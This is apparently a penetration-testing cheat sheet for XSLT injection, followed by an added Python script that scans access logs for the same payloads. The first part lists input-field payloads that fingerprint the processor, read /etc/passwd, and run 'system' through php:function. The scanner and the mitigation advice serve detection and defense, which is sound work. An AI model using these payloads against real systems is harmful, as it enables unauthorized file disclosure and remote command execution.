XSLT INJECTION (EXPLOITATION)
INFORMATION DISCLOSURE
root@oco:~$ BROWSER > {targetSite:port}
input field:
Version: <xsl:value-of select="system-property('xsl:version')" />
<br/>
Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
<br/>
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
<br/>
Product Name: <xsl:value-of select="system-property('xsl:product-name')" />
<br/>
Product Version: <xsl:value-of select="system-property('xsl:product-version')" />
* if the web application interprets the XSLT elements provided, this confirms an XSLT injection vulnerability.
LOCAL FILE INCLUSION
root@oco:~$ BROWSER > {targetSite:port}
input field: <xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
* whether this payload works depends on the XSLT version and the configuration of the XSLT library
- if the XSLT processor does not support the 'unparsed-text' function, the transformation errors out
- the unparsed-text function reads a local file as plain text and was introduced in XSLT version 2.0
root@oco:~$ BROWSER > {targetSite:port}
input field: <xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />
* if the XSLT processor is configured to expose PHP functions, the injected php:function call is executed as part of the transformation
- the PHP function file_get_contents is used to read a local file
RCE
root@oco:~$ BROWSER > {targetSite:port}
input field: <xsl:value-of select="php:function('system','id')" />
* if an XSLT processor supports PHP functions, the 'system' function can be used to execute an operating-system command
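Detection-side companion for the three payload families above (system-property fingerprinting, unparsed-text file reads and php:function calls). This is an added example, not part of the original note: a small Python script that scans web-server access-log lines for XSLT injection indicators, URL-decoding repeatedly so double-encoded input is still caught. The log lines, the xsl query parameter name and the regexes are constructed for the example and should be tuned to the real application.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns, one per payload family discussed above. Constructed for
# this example; extend with the xsl: elements your own templates never use.
XSLT_INDICATORS = {
    "fingerprint": re.compile(r"system-property\s*\(\s*['\"]xsl:", re.I),
    "file-read": re.compile(r"unparsed-text\s*\(", re.I),
    "php-function": re.compile(r"php:function\s*\(", re.I),
    "xsl-element": re.compile(r"<\s*xsl:(value-of|copy-of|variable|template)\b", re.I),
}


def decode_request(raw: str, rounds: int = 3) -> str:
    """URL-decode up to `rounds` times so double-encoded payloads become visible."""
    current = raw
    for _ in range(rounds):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current


def scan_request(line: str) -> list:
    """Return the sorted indicator labels that match one decoded log line."""
    decoded = decode_request(line)
    return sorted(label for label, rx in XSLT_INDICATORS.items() if rx.search(decoded))


def scan_log(lines) -> list:
    """Return (line_number, labels) for every log line with at least one hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        labels = scan_request(line)
        if labels:
            hits.append((number, labels))
    return hits


# Constructed access-log lines; the 'xsl' parameter is a hypothetical input
# field that the application feeds into a stylesheet.
SAMPLE_LOG = [
    # fingerprinting: <xsl:value-of select="system-property('xsl:vendor')"/>
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /report?xsl='
    '%3Cxsl%3Avalue-of+select%3D%22system-property(%27xsl%3Avendor%27)%22%2F%3E HTTP/1.1" 200 512',
    # file read via unparsed-text
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /report?xsl='
    '%3Cxsl%3Avalue-of+select%3D%22unparsed-text(%27/etc/passwd%27,%27utf-8%27)%22%2F%3E HTTP/1.1" 500 88',
    # double URL-encoded php:function call
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /report?xsl='
    '%253Cxsl%253Avalue-of+select%253D%2522php%253Afunction(%2527system%2527,%2527id%2527)%2522%252F%253E HTTP/1.1" 200 64',
    # benign request
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /report?xsl=quarterly&format=html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, labels in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(labels)}")
```

The scanner is a triage aid, not a fix: string matching can be evaded, so the actual mitigation is to never build a stylesheet from user-controlled text, to leave PHP's XSLTProcessor::registerPHPFunctions() uncalled, and to restrict file and network access with XSLTProcessor::setSecurityPrefs().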